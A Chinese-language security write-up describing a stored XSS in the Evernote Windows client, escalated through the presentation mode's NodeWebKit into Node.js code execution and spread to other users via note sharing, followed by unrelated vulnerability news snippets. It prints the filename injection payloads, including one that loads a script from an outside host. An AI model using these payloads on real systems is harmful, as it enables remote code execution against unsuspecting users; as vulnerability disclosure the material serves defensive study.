一 漏洞简介
1.1.印象笔记
印象笔记支持所有的主流平台系统,一处编辑,全平台之间可以同步。同时,印象笔记支持web版和移动网页版,
只要能上网的设备均可以在浏览器中打开进行操作。
1.2.漏洞情况
二 漏洞详情
2.1.印象笔记 Windows 客户端 6.14 储存型 XSS 漏洞
@sebao 发现的储存型 XSS 漏洞的触发方式如下:
1. 在笔记中添加一张图片
2. 右键并将该图片更名为" onclick="alert(1)">.jpg" 3. 双击打开该笔记并点击图片,成功弹框。


经过测试,印象笔记官方修复该 XSS 的方式为:在更名处过滤了 >、<、" 等特殊字符,但有意思的是我在 6.14 版本下测试
的 XSS 在 6.15 版本中依旧可以弹框,这也就意味着:官方只修了 XSS 的入口,在 XSS 的输出位置,依旧是没有任何过滤的。
2.2 演示模式下的 Nodejs 代码注入
在 6.14 版本的客户端中将一张图片更名为 " onclick="alert(1)"><script src="http://172.16.4.1:8000/1.js">.jpg 后,
将客户端升级为最新版 6.15。
遍历 C:\\Program Files(x86)\Evernote\Evernote\ 目录下的所有文件。
我发现印象笔记在C:\\Program Files(x86)\Evernote\Evernote\NodeWebKit 目录下存在 NodeWebKit,
在演示的时候,印象笔记会调用这个NodeWebKit。可以通过之前发现的储存型 XSS 在 NodeWebKit 中执行 Nodejs 代码。

2.3本地文件读取和远程命令执行的实现
既然可以注入 Nodejs 代码,那就意味着可以尝试使用 child_process 来执行任意命令。
尝试使用 require('child_process').exec,但是却报错了: Module name "child_process" has not been loaded yet for context。

How we exploited a remote code execution vulnerability in math.js
根据文中的内容,简单的修改读取本地文件的 payload 很快就实现了相应的功能:

从 window.process.env 中获取到 env 的内容,并使用 spawn_sync 成功地弹出了计算器。

2.4通过分享功能攻击其他用户
在注册了一个小号后,尝试使用分享功能将 恶意笔记 分享给 ”他人“。

我的小号将会在 工作空间 收到别人发来的消息。

小号尝试演示这个笔记,被注入的 Nodejs 代码成功执行!
2020年09月17日,IBM发布安全公告,WebSphere Application Server中存在一个安全漏洞,该漏洞是由于WebSphere Application Server在处理XML数据时容易受到XML外部实体注入(XXE)攻击。
2020年9月22日,FastAdmin远程代码执行漏洞细节曝光,黑客登录前台会员中心,即可远程GetShell,风险极大。
2020年9月17日,VMware发布安全公告,在Spring Framework版本5.2.0-5.2.8、5.1.0-5.1.17、5.0.0-5.0.18、4.3.0-4.3.28和较旧的不受支持的版本中,发现了一个存在于Spring Framework中的反射型文件下载(Reflected File Download,RFD)漏洞(CVE-2020-5421)。

获取安全动态